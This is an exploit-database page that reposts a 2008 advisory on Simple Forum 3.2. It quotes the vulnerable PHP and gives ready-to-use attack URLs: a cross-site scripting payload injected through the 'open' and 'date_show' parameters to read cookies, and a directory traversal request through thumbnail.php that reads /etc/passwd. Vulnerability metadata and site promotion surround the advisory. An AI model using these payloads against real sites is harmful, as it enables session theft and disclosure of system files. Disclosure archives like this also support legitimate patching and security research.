Lucene search
+L

Simple Forum 3.2 - File Disclosure / Cross-Site Scripting

🗓️ 26 Jan 2008 00:00:00Reported by tomplixseeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 49 Views

Simple Forum 3.2 Multiple Vulnerabilities including Cross-Site Scripting and Remote File Disclosur

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2008-0541
1 Feb 200819:41
cve
cve
CVE
CVE-2008-0542
1 Feb 200819:41
cve
cvelist
Cvelist
CVE-2008-0541
1 Feb 200819:41
cvelist
cvelist
Cvelist
CVE-2008-0542
1 Feb 200819:41
cvelist
euvd
EUVD
EUVD-2008-0551
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2008-0552
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-0541
1 Feb 200820:00
nvd
nvd
NVD
CVE-2008-0542
1 Feb 200820:00
nvd
prion
Prion
Cross site scripting
1 Feb 200820:00
prion
prion
Prion
Directory traversal
1 Feb 200820:00
prion
Rows per page
           ########################################################
           #                                                      #
           # SIMPLE FORUM v 3.2 MULTIPLE VULNERABILITIES          #
           # author      : tomplixsee                             #
           # my email    : [email protected]                 #
           #                                                      #
           # software    : SIMPLE FORUM v3.2                      #
           # download    : http://www.gerd-tentler.de/tools/forum/#
           #                                                      #
           ########################################################


1.XSS
  vulnerable code on forum.php

  <?
  .....
  if(isset($_REQUEST['date_show'])) $date_show = $_REQUEST['date_show'];
  .....
  if(isset($_REQUEST['open'])) $open = $_REQUEST['open'];
  .....
  <input type="hidden" name="date_show" value="<? echo $date_show; ?>">
  <input type="hidden" name="open" value="<? echo $open; ?>">
  .....
example:
  http://target/path/forum.php?open="/><script>alert(document.cookie)</script>
  http://target/path/forum.php?date_show="/><script>alert(document.cookie)</script>


2.Remote File Disclosure
  vulnerable code on thumbnail.php

  <?
  ....
  if(isset($_REQUEST['file'])) $file = $_REQUEST['file'];
  if(isset($_REQUEST['type'])) $type = $_REQUEST['type'];
  ....
  switch($type) {
      case 1:
        if($img && function_exists('ImageGIF')) {
          header('Content-type: image/gif');
          @ImageGIF($img);
        }
        else if($img && function_exists('ImagePNG')) {
          header('Content-type: image/png');
          @ImagePNG($img);
        }
        else {
          header('Content-type: image/gif');
          readfile($file);
        }
      break;

      case 2:
        header('Content-type: image/jpeg');
        if($img && function_exists('ImageJPEG')) @ImageJPEG($img);
        else readfile($file);
      break;

      case 3:
        header('Content-type: image/png');
        if($img && function_exists('ImagePNG')) @ImagePNG($img);
        else readfile($file);
      break;
              }
  ....
  ?>

example:
 http://target/path/thumbnail.php?type=3&file=../../../../../../../etc/passwd
 then try to view the page source :D



salam tuk:
ira, sukabirus network community, akillers 179,bidulux,sibalbal,crutz_ao,

# milw0rm.com [2008-01-26]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.02672
49